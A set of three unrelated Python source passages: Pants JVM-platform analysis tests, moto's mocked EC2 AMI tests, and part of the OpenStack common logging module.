d = self._java('d', deps=[l])
g = self._java('g')
f = self._plain('f', deps=[g])
c = self._plain('c', deps=[d,f,e])
b = self._java('b')
a = self._java('a', deps=[b,c])
return [a,b,c,d,e,f,g,q,n,l]
def assert_depmaps_equal(self, expected, received):
jvm_deps = {target.name: ''.join(sorted({t.name for t in deps}))
for target, deps in received.items()}
for target, deps in sorted(expected.items()):
got = jvm_deps.get(target, ())
self.assertEqual(set(deps), set(got), '{}\n expected {}\n got {}\n \n{}'
.format(target, deps, got, '\n'.join(
'{}: {}'.format(key, val) for key, val in sorted(jvm_deps.items())
)))
self.assertEqual(len(list(filter(expected.get, expected))), len(list(filter(jvm_deps.get, jvm_deps))))
def test_non_jvm_transitivity(self):
"""Tests the behavior of jvm_dependency_map."""
expected = {
'n': '',
'g': '',
'q': '',
'l': 'n',
'd': 'n',
'f': 'g',
'e': '',
'c': 'gd',
'b': '',
'a': 'gdb',
}
jvm_deps = self.simple_task(self.construct_interesting_graph())._unfiltered_jvm_dependency_map()
self.assert_depmaps_equal(expected, jvm_deps)
def test_full_transitivity(self):
"""Tests the behavior of jvm_dependency_map when including all transitive dependencies."""
expected = {
'n': '',
'g': '',
'q': '',
'l': 'n',
'd': 'n',
'f': 'g',
'e': '',
'c': 'gdn',
'b': '',
'a': 'gdbn',
}
task = self.simple_task(self.construct_interesting_graph())
jvm_deps = task._unfiltered_jvm_dependency_map(fully_transitive=True)
self.assert_depmaps_equal(expected, jvm_deps)
class JvmPlatformExplainTest(JvmPlatformAnalysisTestMixin, TaskTestBase):
@classmethod
def task_type(cls):
return JvmPlatformExplain
def get_lines(self, targets, trimmed=True, **options):
output = self.simple_task(targets, **options).console_output(targets)
if trimmed:
output = [line.strip() for line in output if line and line.strip()]
return tuple(output)
def assert_lines(self, lines, targets, **options):
self.assertEqual(lines, self.get_lines(targets, **options))
def assert_length(self, count, targets, **options):
self.assertEqual(count, len(self.get_lines(targets, **options)))
def test_change_only_quiet(self):
lines = self.get_lines(self.good_targets(), only_broken=True)
self.assertEqual(1, len(lines))
self.assertIn('Allowable JVM platform ranges', lines[0])
def test_undetailed_good(self):
targets = self.good_transitive_targets()
self.assert_length(len(targets), targets, detailed=False)
def test_broken(self):
one = self._java('one', '7')
two = self._java('two', '6', deps=[one])
targets = [one, two]
expected = ('Allowable JVM platform ranges (* = anything):',
'java:one: <=1.6 (is 1.7)',
'max=1.6 because of dependees:',
'java:two',
'java:two: 1.7+ (is 1.6)',
'min=1.7 because of dependencies:',
'java:one',)
self.assert_lines(expected, targets, only_broken=True, colors=False)
def test_upgradeable(self):
one = self._java('one', '6')
two = self._java('two', '7', deps=[one])
three = self._java('three', '6', deps=[one])
text = '\n'.join(self.get_lines([one, two, three], colors=False, ranges=False, upgradeable=True))
self.assertNotIn('java:one', text)
self.assertIn('java:three', text)
self.assertIn('java:two', text)
def test_downgradeable(self):
one = self._java('one', '6')
two = self._java('two', '7', deps=[one])
nope = self._java('nope', '6', deps=[one])
text = '\n'.join(self.get_lines([one, two, nope], colors=False, ranges=False,
downgradeable=True))
self.assertIn('java:one', text)
self.assertNotIn('java:nope', text)
self.assertIn('java:two', text)
|
|
from __future__ import unicode_literals
# Ensure 'assert_raises' context manager support for Python 2.6
import tests.backport_assert_raises # noqa
from nose.tools import assert_raises
import boto
import boto3
import boto.ec2
import boto3
from boto.exception import EC2ResponseError, EC2ResponseError
import sure # noqa
from moto import mock_ec2_deprecated, mock_ec2
from tests.helpers import requires_boto_gte
@mock_ec2_deprecated
def test_ami_create_and_delete():
conn = boto.connect_ec2('the_key', 'the_secret')
reservation = conn.run_instances('ami-1234abcd')
instance = reservation.instances[0]
with assert_raises(EC2ResponseError) as ex:
image_id = conn.create_image(
instance.id, "test-ami", "this is a test ami", dry_run=True)
ex.exception.error_code.should.equal('DryRunOperation')
ex.exception.status.should.equal(400)
ex.exception.message.should.equal(
'An error occurred (DryRunOperation) when calling the CreateImage operation: Request would have succeeded, but DryRun flag is set')
image_id = conn.create_image(instance.id, "test-ami", "this is a test ami")
all_images = conn.get_all_images()
image = all_images[0]
image.id.should.equal(image_id)
image.virtualization_type.should.equal(instance.virtualization_type)
image.architecture.should.equal(instance.architecture)
image.kernel_id.should.equal(instance.kernel)
image.platform.should.equal(instance.platform)
image.creationDate.should_not.be.none
instance.terminate()
# Validate auto-created volume and snapshot
volumes = conn.get_all_volumes()
volumes.should.have.length_of(1)
volume = volumes[0]
snapshots = conn.get_all_snapshots()
snapshots.should.have.length_of(1)
snapshot = snapshots[0]
image.block_device_mapping.current_value.snapshot_id.should.equal(
snapshot.id)
snapshot.description.should.equal(
"Auto-created snapshot for AMI {0}".format(image.id))
snapshot.volume_id.should.equal(volume.id)
# Deregister
with assert_raises(EC2ResponseError) as ex:
success = conn.deregister_image(image_id, dry_run=True)
ex.exception.error_code.should.equal('DryRunOperation')
ex.exception.status.should.equal(400)
ex.exception.message.should.equal(
'An error occurred (DryRunOperation) when calling the DeregisterImage operation: Request would have succeeded, but DryRun flag is set')
success = conn.deregister_image(image_id)
success.should.be.true
with assert_raises(EC2ResponseError) as cm:
conn.deregister_image(image_id)
cm.exception.code.should.equal('InvalidAMIID.NotFound')
cm.exception.status.should.equal(400)
cm.exception.request_id.should_not.be.none
@requires_boto_gte("2.14.0")
@mock_ec2_deprecated
def test_ami_copy():
conn = boto.ec2.connect_to_region("us-west-1")
reservation = conn.run_instances('ami-1234abcd')
instance = reservation.instances[0]
source_image_id = conn.create_image(
instance.id, "test-ami", "this is a test ami")
instance.terminate()
source_image = conn.get_all_images(image_ids=[source_image_id])[0]
# Boto returns a 'CopyImage' object with an image_id attribute here. Use
# the image_id to fetch the full info.
with assert_raises(EC2ResponseError) as ex:
copy_image_ref = conn.copy_image(
source_image.region.name, source_image.id, "test-copy-ami", "this is a test copy ami", dry_run=True)
ex.exception.error_code.should.equal('DryRunOperation')
ex.exception.status.should.equal(400)
ex.exception.message.should.equal(
'An error occurred (DryRunOperation) when calling the CopyImage operation: Request would have succeeded, but DryRun flag is set')
copy_image_ref = conn.copy_image(
source_image.region.name, source_image.id, "test-copy-ami", "this is a test copy ami")
copy_image_id = copy_image_ref.image_id
copy_image = conn.get_all_images(image_ids=[copy_image_id])[0]
copy_image.id.should.equal(copy_image_id)
copy_image.virtualization_type.should.equal(
source_image.virtualization_type)
copy_image.architecture.should.equal(source_image.architecture)
copy_image.kernel_id.should.equal(source_image.kernel_id)
copy_image.platform.should.equal(source_image.platform)
# Validate auto-created volume and snapshot
conn.get_all_volumes().should.have.length_of(2)
conn.get_all_snapshots().should.have.length_of(2)
copy_image.block_device_mapping.current_value.snapshot_id.should_not.equal(
source_image.block_device_mapping.current_value.snapshot_id)
# Copy from non-existent source ID.
with assert_raises(EC2ResponseError) as cm:
conn.copy_image(source_image.region.name, 'ami-abcd1234',
"test-copy-ami", "this is a test copy ami")
cm.exception.code.should.equal('InvalidAMIID.NotFound')
cm.exception.status.should.equal(400)
cm.exception.request_id.should_not.be.none
# Copy from non-existent source region.
with assert_raises(EC2ResponseError) as cm:
invalid_region = 'us-east-1' if (source_image.region.name !=
'us-east-1') else 'us-west-1'
conn.copy_image(invalid_region, source_image.id,
"test-copy-ami", "this is a test copy ami")
cm.exception.code.should.equal('InvalidAMIID.NotFound')
cm.exception.status.should.equal(400)
cm.exception.request_id.should_not.be.none
@mock_ec2_deprecated
def test_ami_tagging():
conn = boto.connect_vpc('the_key', 'the_secret')
reservation = conn.run_instances('ami-1234abcd')
instance = reservation.instances[0]
conn.create_image(instance.id, "test-ami", "this is a test ami")
image = conn.get_all_images()[0]
with assert_raises(EC2ResponseError) as ex:
image.add_tag("a key", "some value", dry_run=True)
ex.exception.error_code.should.equal('DryRunOperation')
ex.exception.status.should.equal(400)
ex.exception.message.should.equal(
'An error occurred (DryRunOperation) when calling the CreateTags operation: Request would have succeeded, but DryRun flag is set')
image.add_tag("a key", "some value")
tag = conn.get_all_tags()[0]
tag.name.should.equal("a key")
tag.value.should.equal("some value")
# Refresh the DHCP options
image = conn.get_all_images()[0]
image.tags.should.have.length_of(1)
image.tags["a key"].should.equal("some value")
@mock_ec2_deprecated
def test_ami_create_from_missing_instance():
conn = boto.connect_ec2('the_key', 'the_secret')
args = ["i-abcdefg", "test-ami", "this is a test ami"]
with assert_raises(EC2ResponseError) as cm:
conn.create_image(*args)
cm.exception.code.should.equal('InvalidInstanceID.NotFound')
cm.exception.status.should.equal(400)
cm.exception.request_id.should_not.be.none
@mock_ec2_deprecated
def test_ami_pulls_attributes_from_instance():
conn = boto.connect_ec2('the_key', 'the_secret')
reservation = conn.run_instances('ami-1234abcd')
instance = reservation.instances[0]
instance.modify_attribute("kernel", "test-kernel")
image_id = conn.create_image(instance.id, "test-ami", "this is a test ami")
image = conn.get_image(image_id)
image.kernel_id.should.equal('test-kernel')
@mock_ec2_deprecated
def test_ami_filters():
conn = boto.connect_ec2('the_key', 'the_secret')
reservationA = conn.run_instances('ami-1234abcd')
instanceA = reservationA.instances[0]
instanceA.modify_attribute("architecture", "i386")
instanceA.modify_attribute("kernel", "k-1234abcd")
instanceA.modify_attribute("platform", "windows")
instanceA.modify_attribute("virtualization_type", "hvm")
imageA_id = conn.create_image(
instanceA.id, "test-ami-A", "this is a test ami")
imageA = conn.get_image(imageA_id)
reservationB = conn.run_instances('ami-abcd1234')
instanceB = reservationB.instances[0]
instanceB.modify_attribute("architecture", "x86_64")
instanceB.modify_attribute("kernel", "k-abcd1234")
instanceB.modify_attribute("platform", "linux")
instanceB.modify_attribute("virtualization_type", "paravirtual")
imageB_id = conn.create_image(
instanceB.id, "test-ami-B", "this is a test ami")
imageB = conn.get_image(imageB_id)
imageB.set_launch_permissions(group_names=("all"))
amis_by_architecture = conn.get_all_images(
filters={'architecture': 'x86_64'})
set([ami.id for ami in amis_by_architecture]).should.equal(set([imageB.id]))
amis_by_kernel = conn.get_all_images(filters={'kernel-id': 'k-abcd1234'})
set([ami.id for ami in amis_by_kernel]).should.equal(set([imageB.id]))
amis_by_virtualization = conn.get_all_images(
filters={'virtualization-type': 'paravirtual'})
set([ami.id for ami in amis_by_virtualization]
).should.equal(set([imageB.id]))
amis_by_platform = conn.get_all_images(filters={'platform': 'windows'})
set([ami.id for ami in amis_by_platform]).should.equal(set([imageA.id]))
amis_by_id = conn.get_all_images(filters={'image-id': imageA.id})
set([ami.id for ami in amis_by_id]).should.equal(set([imageA.id]))
amis_by_state = conn.get_all_images(filters={'state': 'available'})
set([ami.id for ami in amis_by_state]).should.equal(
set([imageA.id, imageB.id]))
amis_by_name = conn.get_all_images(filters={'name': imageA.name})
set([ami.id for ami in amis_by_name]).should.equal(set([imageA.id]))
amis_by_public = conn.get_all_images(filters={'is-public': True})
set([ami.id for ami in amis_by_public]).should.equal(set([imageB.id]))
amis_by_nonpublic = conn.get_all_images(filters={'is-public': False})
set([ami.id for ami in amis_by_nonpublic]).should.equal(set([imageA.id]))
@mock_ec2_deprecated
def test_ami_filtering_via_tag():
conn = boto.connect_vpc('the_key', 'the_secret')
reservationA = conn.run_instances('ami-1234abcd')
instanceA = reservationA.instances[0]
imageA_id = conn.create_image(
instanceA.id, "test-ami-A", "this is a test ami")
imageA = conn.get_image(imageA_id)
imageA.add_tag("a key", "some value")
reservationB = conn.run_instances('ami-abcd1234')
instanceB = reservationB.instances[0]
imageB_id = conn.create_image(
instanceB.id, "test-ami-B", "this is a test ami")
imageB = conn.get_image(imageB_id)
imageB.add_tag("another key", "some other value")
amis_by_tagA = conn.get_all_images(filters={'tag:a key': 'some value'})
set([ami.id for ami in amis_by_tagA]).should.equal(set([imageA.id]))
amis_by_tagB = conn.get_all_images(
filters={'tag:another key': 'some other value'})
set([ami.id for ami in amis_by_tagB]).should.equal(set([imageB.id]))
@mock_ec2_deprecated
def test_getting_missing_ami():
conn = boto.connect_ec2('the_key', 'the_secret')
with assert_raises(EC2ResponseError) as cm:
conn.get_image('ami-missing')
cm.exception.code.should.equal('InvalidAMIID.NotFound')
cm.exception.status.should.equal(400)
cm.exception.request_id.should_not.be.none
@mock_ec2_deprecated
def test_getting_malformed_ami():
conn = boto.connect_ec2('the_key', 'the_secret')
with assert_raises(EC2ResponseError) as cm:
conn.get_image('foo-missing')
cm.exception.code.should.equal('InvalidAMIID.Malformed')
cm.exception.status.should.equal(400)
cm.exception.request_id.should_not.be.none
@mock_ec2_deprecated
def test_ami_attribute_group_permissions():
conn = boto.connect_ec2('the_key', 'the_secret')
reservation = conn.run_instances('ami-1234abcd')
instance = reservation.instances[0]
image_id = conn.create_image(instance.id, "test-ami", "this is a test ami")
image = conn.get_image(image_id)
# Baseline
attributes = conn.get_image_attribute(
image.id, attribute='launchPermission')
attributes.name.should.equal('launch_permission')
attributes.attrs.should.have.length_of(0)
ADD_GROUP_ARGS = {'image_id': image.id,
'attribute': 'launchPermission',
'operation': 'add',
'groups': 'all'}
REMOVE_GROUP_ARGS = {'image_id': image.id,
'attribute': 'launchPermission',
'operation': 'remove',
'groups': 'all'}
# Add 'all' group and confirm
with assert_raises(EC2ResponseError) as ex:
conn.modify_image_attribute(
**dict(ADD_GROUP_ARGS, **{'dry_run': True}))
ex.exception.error_code.should.equal('DryRunOperation')
ex.exception.status.should.equal(400)
ex.exception.message.should.equal(
'An error occurred (DryRunOperation) when calling the ModifyImageAttribute operation: Request would have succeeded, but DryRun flag is set')
conn.modify_image_attribute(**ADD_GROUP_ARGS)
attributes = conn.get_image_attribute(
image.id, attribute='launchPermission')
attributes.attrs['groups'].should.have.length_of(1)
attributes.attrs['groups'].should.equal(['all'])
image = conn.get_image(image_id)
image.is_public.should.equal(True)
# Add is idempotent
conn.modify_image_attribute.when.called_with(
**ADD_GROUP_ARGS).should_not.throw(EC2ResponseError)
# Remove 'all' group and confirm
conn.modify_image_attribute(**REMOVE_GROUP_ARGS)
attributes = conn.get_image_attribute(
image.id, attribute='launchPermission')
attributes.attrs.should.have.length_of(0)
image = conn.get_image(image_id)
image.is_public.should.equal(False)
# Remove is idempotent
conn.modify_image_attribute.when.called_with(
**REMOVE_GROUP_ARGS).should_not.throw(EC2ResponseError)
@mock_ec2_deprecated
def test_ami_attribute_user_permissions():
conn = boto.connect_ec2('the_key', 'the_secret')
reservation = conn.run_instances('ami-1234abcd')
instance = reservation.instances[0]
image_id = conn.create_image(instance.id, "test-ami", "this is a test ami")
image = conn.get_image(image_id)
# Baseline
attributes = conn.get_image_attribute(
image.id, attribute='launchPermission')
attributes.name.should.equal('launch_permission')
attributes.attrs.should.have.length_of(0)
# Both str and int values should work.
USER1 = '123456789011'
USER2 = 123456789022
ADD_USERS_ARGS = {'image_id': image.id,
'attribute': 'launchPermission',
'operation': 'add',
'user_ids': [USER1, USER2]}
REMOVE_USERS_ARGS = {'image_id': image.id,
'attribute': 'launchPermission',
'operation': 'remove',
'user_ids': [USER1, USER2]}
REMOVE_SINGLE_USER_ARGS = {'image_id': image.id,
'attribute': 'launchPermission',
'operation': 'remove',
'user_ids': [USER1]}
# Add multiple users and confirm
conn.modify_image_attribute(**ADD_USERS_ARGS)
attributes = conn.get_image_attribute(
image.id, attribute='launchPermission')
attributes.attrs['user_ids'].should.have.length_of(2)
set(attributes.attrs['user_ids']).should.equal(
set([str(USER1), str(USER2)]))
image = conn.get_image(image_id)
image.is_public.should.equal(False)
# Add is idempotent
conn.modify_image_attribute.when.called_with(
**ADD_USERS_ARGS).should_not.throw(EC2ResponseError)
# Remove single user and confirm
conn.modify_image_attribute(**REMOVE_SINGLE_USER_ARGS)
attributes = conn.get_image_attribute(
image.id, attribute='launchPermission')
attributes.attrs['user_ids'].should.have.length_of(1)
set(attributes.attrs['user_ids']).should.equal(set([str(USER2)]))
image = conn.get_image(image_id)
image.is_public.should.equal(False)
# Remove multiple users and confirm
conn.modify_image_attribute(**REMOVE_USERS_ARGS)
attributes = conn.get_image_attribute(
image.id, attribute='launchPermission')
attributes.attrs.should.have.length_of(0)
image = conn.get_image(image_id)
image.is_public.should.equal(False)
# Remove is idempotent
conn.modify_image_attribute.when.called_with(
**REMOVE_USERS_ARGS).should_not.throw(EC2ResponseError)
@mock_ec2_deprecated
def test_ami_describe_executable_users():
conn = boto3.client('ec2', region_name='us-east-1')
ec2 = boto3.resource('ec2', 'us-east-1')
ec2.create_instances(ImageId='',
MinCount=1,
MaxCount=1)
response = conn.describe_instances(Filters=[{'Name': 'instance-state-name','Values': ['running']}])
instance_id = response['Reservations'][0]['Instances'][0]['InstanceId']
image_id = conn.create_image(InstanceId=instance_id,
Name='TestImage',)['ImageId']
USER1 = '123456789011'
ADD_USER_ARGS = {'ImageId': image_id,
'Attribute': 'launchPermission',
'OperationType': 'add',
'UserIds': [USER1]}
# Add users and get no images
conn.modify_image_attribute(**ADD_USER_ARGS)
attributes = conn.describe_image_attribute(ImageId=image_id,
Attribute='LaunchPermissions',
DryRun=False)
attributes['LaunchPermissions'].should.have.length_of(1)
attributes['LaunchPermissions'][0]['UserId'].should.equal(USER1)
images = conn.describe_images(ExecutableUsers=[USER1])['Images']
images.should.have.length_of(1)
images[0]['ImageId'].should.equal(image_id)
@mock_ec2_deprecated
def test_ami_describe_executable_users_negative():
conn = boto3.client('ec2', region_name='us-east-1')
ec2 = boto3.resource('ec2', 'us-east-1')
ec2.create_instances(ImageId='',
MinCount=1,
MaxCount=1)
response = conn.describe_instances(Filters=[{'Name': 'instance-state-name','Values': ['running']}])
instance_id = response['Reservations'][0]['Instances'][0]['InstanceId']
image_id = conn.create_image(InstanceId=instance_id,
Name='TestImage')['ImageId']
USER1 = '123456789011'
USER2 = '113355789012'
ADD_USER_ARGS = {'ImageId': image_id,
'Attribute': 'launchPermission',
'OperationType': 'add',
'UserIds': [USER1]}
# Add users and get no images
conn.modify_image_attribute(**ADD_USER_ARGS)
attributes = conn.describe_image_attribute(ImageId=image_id,
Attribute='LaunchPermissions',
DryRun=False)
attributes['LaunchPermissions'].should.have.length_of(1)
attributes['LaunchPermissions'][0]['UserId'].should.equal(USER1)
images = conn.describe_images(ExecutableUsers=[USER2])['Images']
images.should.have.length_of(0)
@mock_ec2_deprecated
def test_ami_describe_executable_users_and_filter():
conn = boto3.client('ec2', region_name='us-east-1')
ec2 = boto3.resource('ec2', 'us-east-1')
ec2.create_instances(ImageId='',
MinCount=1,
MaxCount=1)
response = conn.describe_instances(Filters=[{'Name': 'instance-state-name','Values': ['running']}])
instance_id = response['Reservations'][0]['Instances'][0]['InstanceId']
image_id = conn.create_image(InstanceId=instance_id,
Name='ImageToDelete',)['ImageId']
USER1 = '123456789011'
ADD_USER_ARGS = {'ImageId': image_id,
'Attribute': 'launchPermission',
'OperationType': 'add',
'UserIds': [USER1]}
# Add users and get no images
conn.modify_image_attribute(**ADD_USER_ARGS)
attributes = conn.describe_image_attribute(ImageId=image_id,
Attribute='LaunchPermissions',
DryRun=False)
attributes['LaunchPermissions'].should.have.length_of(1)
attributes['LaunchPermissions'][0]['UserId'].should.equal(USER1)
images = conn.describe_images(ExecutableUsers=[USER1],
Filters=[{'Name': 'state', 'Values': ['available']}])['Images']
images.should.have.length_of(1)
images[0]['ImageId'].should.equal(image_id)
@mock_ec2_deprecated
def test_ami_attribute_user_and_group_permissions():
"""
Boto supports adding/removing both users and groups at the same time.
Just spot-check this -- input variations, idempotency, etc are validated
via user-specific and group-specific tests above.
"""
conn = boto.connect_ec2('the_key', 'the_secret')
reservation = conn.run_instances('ami-1234abcd')
instance = reservation.instances[0]
image_id = conn.create_image(instance.id, "test-ami", "this is a test ami")
image = conn.get_image(image_id)
# Baseline
attributes = conn.get_image_attribute(
image.id, attribute='launchPermission')
attributes.name.should.equal('launch_permission')
attributes.attrs.should.have.length_of(0)
USER1 = '123456789011'
USER2 = '123456789022'
ADD_ARGS = {'image_id': image.id,
'attribute': 'launchPermission',
'operation': 'add',
'groups': ['all'],
'user_ids': [USER1, USER2]}
REMOVE_ARGS = {'image_id': image.id,
'attribute': 'launchPermission',
'operation': 'remove',
'groups': ['all'],
'user_ids': [USER1, USER2]}
# Add and confirm
conn.modify_image_attribute(**ADD_ARGS)
attributes = conn.get_image_attribute(
image.id, attribute='launchPermission')
attributes.attrs['user_ids'].should.have.length_of(2)
set(attributes.attrs['user_ids']).should.equal(set([USER1, USER2]))
set(attributes.attrs['groups']).should.equal(set(['all']))
image = conn.get_image(image_id)
image.is_public.should.equal(True)
# Remove and confirm
conn.modify_image_attribute(**REMOVE_ARGS)
attributes = conn.get_image_attribute(
image.id, attribute='launchPermission')
attributes.attrs.should.have.length_of(0)
image = conn.get_image(image_id)
image.is_public.should.equal(False)
@mock_ec2_deprecated
def test_ami_attribute_error_cases():
conn = boto.connect_ec2('the_key', 'the_secret')
reservation = conn.run_instances('ami-1234abcd')
instance = reservation.instances[0]
image_id = conn.create_image(instance.id, "test-ami", "this is a test ami")
image = conn.get_image(image_id)
# Error: Add with group != 'all'
with assert_raises(EC2ResponseError) as cm:
conn.modify_image_attribute(image.id,
attribute='launchPermission',
operation='add',
groups='everyone')
cm.exception.code.should.equal('InvalidAMIAttributeItemValue')
cm.exception.status.should.equal(400)
cm.exception.request_id.should_not.be.none
# Error: Add with user ID that isn't an integer.
with assert_raises(EC2ResponseError) as cm:
conn.modify_image_attribute(image.id,
attribute='launchPermission',
operation='add',
user_ids='12345678901A')
cm.exception.code.should.equal('InvalidAMIAttributeItemValue')
cm.exception.status.should.equal(400)
cm.exception.request_id.should_not.be.none
# Error: Add with user ID that is > length 12.
with assert_raises(EC2ResponseError) as cm:
conn.modify_image_attribute(image.id,
attribute='launchPermission',
operation='add',
user_ids='1234567890123')
cm.exception.code.should.equal('InvalidAMIAttributeItemValue')
cm.exception.status.should.equal(400)
cm.exception.request_id.should_not.be.none
# Error: Add with user ID that is < length 12.
with assert_raises(EC2ResponseError) as cm:
conn.modify_image_attribute(image.id,
attribute='launchPermission',
operation='add',
user_ids='12345678901')
cm.exception.code.should.equal('InvalidAMIAttributeItemValue')
cm.exception.status.should.equal(400)
cm.exception.request_id.should_not.be.none
# Error: Add with one invalid user ID among other valid IDs, ensure no
# partial changes.
with assert_raises(EC2ResponseError) as cm:
conn.modify_image_attribute(image.id,
attribute='launchPermission',
operation='add',
user_ids=['123456789011', 'foo', '123456789022'])
cm.exception.code.should.equal('InvalidAMIAttributeItemValue')
cm.exception.status.should.equal(400)
cm.exception.request_id.should_not.be.none
attributes = conn.get_image_attribute(
image.id, attribute='launchPermission')
attributes.attrs.should.have.length_of(0)
# Error: Add with invalid image ID
with assert_raises(EC2ResponseError) as cm:
conn.modify_image_attribute("ami-abcd1234",
attribute='launchPermission',
operation='add',
groups='all')
cm.exception.code.should.equal('InvalidAMIID.NotFound')
cm.exception.status.should.equal(400)
cm.exception.request_id.should_not.be.none
# Error: Remove with invalid image ID
with assert_raises(EC2ResponseError) as cm:
conn.modify_image_attribute("ami-abcd1234",
attribute='launchPermission',
operation='remove',
groups='all')
cm.exception.code.should.equal('InvalidAMIID.NotFound')
cm.exception.status.should.equal(400)
cm.exception.request_id.should_not.be.none
"""
Boto3
"""
@mock_ec2
def test_ami_filter_wildcard():
ec2 = boto3.resource('ec2', region_name='us-west-1')
instance = ec2.create_instances(ImageId='ami-1234abcd', MinCount=1, MaxCount=1)[0]
image = instance.create_image(Name='test-image')
filter_result = list(ec2.images.filter(Owners=['111122223333'], Filters=[{'Name':'name', 'Values':['test*']}]))
assert filter_result == [image]
|
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 OpenStack Foundation.
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Openstack logging handler.
This module adds to logging functionality by adding the option to specify
a context object when calling the various log methods. If the context object
is not specified, default formatting is used. Additionally, an instance uuid
may be passed as part of the log message, which is intended to make it easier
for admins to find messages related to a specific instance.
It also allows setting of formatting information through conf.
"""
import ConfigParser
import cStringIO
import inspect
import itertools
import logging
import logging.config
import logging.handlers
import os
import sys
import traceback
from oslo.config import cfg
from sarlacc.openstack.common.gettextutils import _
from sarlacc.openstack.common import importutils
from sarlacc.openstack.common import jsonutils
from sarlacc.openstack.common import local
_DEFAULT_LOG_DATE_FORMAT = "%Y-%m-%d %H:%M:%S"
common_cli_opts = [
cfg.BoolOpt('debug',
short='d',
default=False,
help='Print debugging output (set logging level to '
'DEBUG instead of default WARNING level).'),
cfg.BoolOpt('verbose',
short='v',
default=False,
help='Print more verbose output (set logging level to '
'INFO instead of default WARNING level).'),
]
logging_cli_opts = [
cfg.StrOpt('log-config',
metavar='PATH',
help='If this option is specified, the logging configuration '
'file specified is used and overrides any other logging '
'options specified. Please see the Python logging module '
'documentation for details on logging configuration '
'files.'),
cfg.StrOpt('log-format',
default=None,
metavar='FORMAT',
help='A logging.Formatter log message format string which may '
'use any of the available logging.LogRecord attributes. '
'This option is deprecated. Please use '
'logging_context_format_string and '
'logging_default_format_string instead.'),
cfg.StrOpt('log-date-format',
default=_DEFAULT_LOG_DATE_FORMAT,
metavar='DATE_FORMAT',
help='Format string for %%(asctime)s in log records. '
'Default: %(default)s'),
cfg.StrOpt('log-file',
metavar='PATH',
deprecated_name='logfile',
help='(Optional) Name of log file to output to. '
'If no default is set, logging will go to stdout.'),
cfg.StrOpt('log-dir',
deprecated_name='logdir',
help='(Optional) The base directory used for relative '
'--log-file paths'),
cfg.BoolOpt('use-syslog',
default=False,
help='Use syslog for logging.'),
cfg.StrOpt('syslog-log-facility',
default='LOG_USER',
help='syslog facility to receive log lines')
]
generic_log_opts = [
cfg.BoolOpt('use_stderr',
default=True,
help='Log output to standard error')
]
log_opts = [
cfg.StrOpt('logging_context_format_string',
default='%(asctime)s.%(msecs)03d %(process)d %(levelname)s '
'%(name)s [%(request_id)s %(user)s %(tenant)s] '
'%(instance)s%(message)s',
help='format string to use for log messages with context'),
cfg.StrOpt('logging_default_format_string',
default='%(asctime)s.%(msecs)03d %(process)d %(levelname)s '
'%(name)s [-] %(instance)s%(message)s',
help='format string to use for log messages without context'),
cfg.StrOpt('logging_debug_format_suffix',
default='%(funcName)s %(pathname)s:%(lineno)d',
help='data to append to log format when level is DEBUG'),
cfg.StrOpt('logging_exception_prefix',
default='%(asctime)s.%(msecs)03d %(process)d TRACE %(name)s '
'%(instance)s',
help='prefix each line of exception output with this format'),
cfg.ListOpt('default_log_levels',
default=[
'amqplib=WARN',
'sqlalchemy=WARN',
'boto=WARN',
'suds=INFO',
'keystone=INFO',
'eventlet.wsgi.server=WARN'
],
help='list of logger=LEVEL pairs'),
cfg.BoolOpt('publish_errors',
default=False,
help='publish error events'),
cfg.BoolOpt('fatal_deprecations',
default=False,
help='make deprecations fatal'),
# NOTE(mikal): there are two options here because sometimes we are handed
# a full instance (and could include more information), and other times we
# are just handed a UUID for the instance.
cfg.StrOpt('instance_format',
default='[instance: %(uuid)s] ',
help='If an instance is passed with the log message, format '
'it like this'),
cfg.StrOpt('instance_uuid_format',
default='[instance: %(uuid)s] ',
help='If an instance UUID is passed with the log message, '
'format it like this'),
]
CONF = cfg.CONF
CONF.register_cli_opts(common_cli_opts)
CONF.register_cli_opts(logging_cli_opts)
CONF.register_opts(generic_log_opts)
CONF.register_opts(log_opts)
# our new audit level
# NOTE(jkoelker) Since we synthesized an audit level, make the logging
# module aware of it so it acts like other levels.
logging.AUDIT = logging.INFO + 1
logging.addLevelName(logging.AUDIT, 'AUDIT')
try:
NullHandler = logging.NullHandler
except AttributeError: # NOTE(jkoelker) NullHandler added in Python 2.7
class NullHandler(logging.Handler):
def handle(self, record):
pass
def emit(self, record):
pass
def createLock(self):
self.lock = None
def _dictify_context(context):
if context is None:
return None
if not isinstance(context, dict) and getattr(context, 'to_dict', None):
context = context.to_dict()
return context
def _get_binary_name():
return os.path.basename(inspect.stack()[-1][1])
def _get_log_file_path(binary=None):
logfile = CONF.log_file
logdir = CONF.log_dir
if logfile and not logdir:
return logfile
if logfile and logdir:
return os.path.join(logdir, logfile)
if logdir:
binary = binary or _get_binary_name()
return '%s.log' % (os.path.join(logdir, binary),)
class BaseLoggerAdapter(logging.LoggerAdapter):
def audit(self, msg, *args, **kwargs):
self.log(logging.AUDIT, msg, *args, **kwargs)
class LazyAdapter(BaseLoggerAdapter):
def __init__(self, name='unknown', version='unknown'):
self._logger = None
self.extra = {}
self.name = name
self.version = version
@property
def logger(self):
if not self._logger:
self._logger = getLogger(self.name, self.version)
return self._logger
class ContextAdapter(BaseLoggerAdapter):
warn = logging.LoggerAdapter.warning
def __init__(self, logger, project_name, version_string):
self.logger = logger
self.project = project_name
self.version = version_string
@property
def handlers(self):
return self.logger.handlers
def deprecated(self, msg, *args, **kwargs):
stdmsg = _("Deprecated: %s") % msg
if CONF.fatal_deprecations:
self.critical(stdmsg, *args, **kwargs)
raise DeprecatedConfig(msg=stdmsg)
else:
self.warn(stdmsg, *args, **kwargs)
def process(self, msg, kwargs):
if 'extra' not in kwargs:
kwargs['extra'] = {}
extra = kwargs['extra']
context = kwargs.pop('context', None)
if not context:
context = getattr(local.store, 'context', None)
if context:
extra.update(_dictify_context(context))
instance = kwargs.pop('instance', None)
instance_extra = ''
if instance:
instance_extra = CONF.instance_format % instance
else:
instance_uuid = kwargs.pop('instance_uuid', None)
if instance_uuid:
instance_extra = (CONF.instance_uuid_format
% {'uuid': instance_uuid})
